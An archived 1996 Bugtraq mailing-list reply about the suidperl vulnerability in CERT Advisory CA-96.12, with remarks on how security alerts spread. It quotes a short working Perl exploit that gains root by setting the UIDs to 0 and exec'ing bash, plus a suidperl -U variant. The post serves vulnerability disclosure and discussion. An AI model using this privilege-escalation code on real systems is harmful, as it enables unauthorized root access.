Bugtraq mailing list archives
Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability
From: rob () brasaap iaehv nl (Rob J. Nauta)
Date: Sun, 30 Jun 1996 11:54:01 +0200
On Fri, 28 Jun 1996 ichudov () algebra com wrote:What is the exploit?Run this as a suid or sgid script. It doesn't matter what user or group it's suid/sgid to...it gets root access. #!/usr/bin/perl $ENV{PATH}="/bin:/usr/bin"; $>=0;$<=0; exec("/bin/bash");
I think it's not entirely correct. I was able to reproduce the bug with #!/usr/bin/suidperl -U as the first line. You need the -U or else suidperl will complain about an insecure function being used. I also used system("/usr/bin/id"); which is more obvious to verify whether the bug exists.
Is it just me...or does it give people the willies knowing such an easy to exploit hole was on their systems...perhaps for years.
Certainly ! I mean, I first heard about this via the CERT advisory while I am on most security lists. I guess via the PERL newsgroups/mailing lists there was an earlier alert, which the bad guys could've gotten, a bad one for all security folks ! Nothing on bugtraq or the -alert lists, I guess many sites could have gotten hacked by people reading PERL news. This just shows 1) CERT alerts aren't that bad, by reading it I reproduced an exploit in minutes 2) security lists aren't everything, don't rely on them too much 3) the usenet security newsgroups are just entertainment and have no useful purpose for discussing new bugs, just general 'what is a firewall?' questions 4) bugtraq doesn't really meet its 'full disclosure' charter, nobody who knew the bug bothered to send in an exploit. I checked an internet provider and they had a new suidperl with a date of june 2nd which was a safe one. I guess they have better sources than me, which is always a disappointment. Rob -- /; ;\ __ \\____// From the keyboard of /{_\_/ \`'\_/__ Rob J. Nauta \;/ \___ (o\ /o } rob () nauta it __//_______________________/ :--' rjn () pobox com / //######## #### \_ `__\ // ###### #### #### \___(o'o) =/ ### ####### ### `===='
Current thread:
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability, (continued)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Andrew Liles (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Jon Lewis (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Casper Dik (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Andrew Liles (Jun 30)
- Validating email sender Brendan McKenna (Jun 30)
- Re: Validating email sender Squidge (Jun 30)
- Re: Validating email sender Alan Brown (Jun 30)
- Re: Validating email sender Casper Dik (Jun 30)
- portmapper dangers der Mouse (Jun 30)
- Re: portmapper dangers Julian Assange (Jun 30)
- Re: portmapper dangers Casper Dik (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Jon Lewis (Jun 30)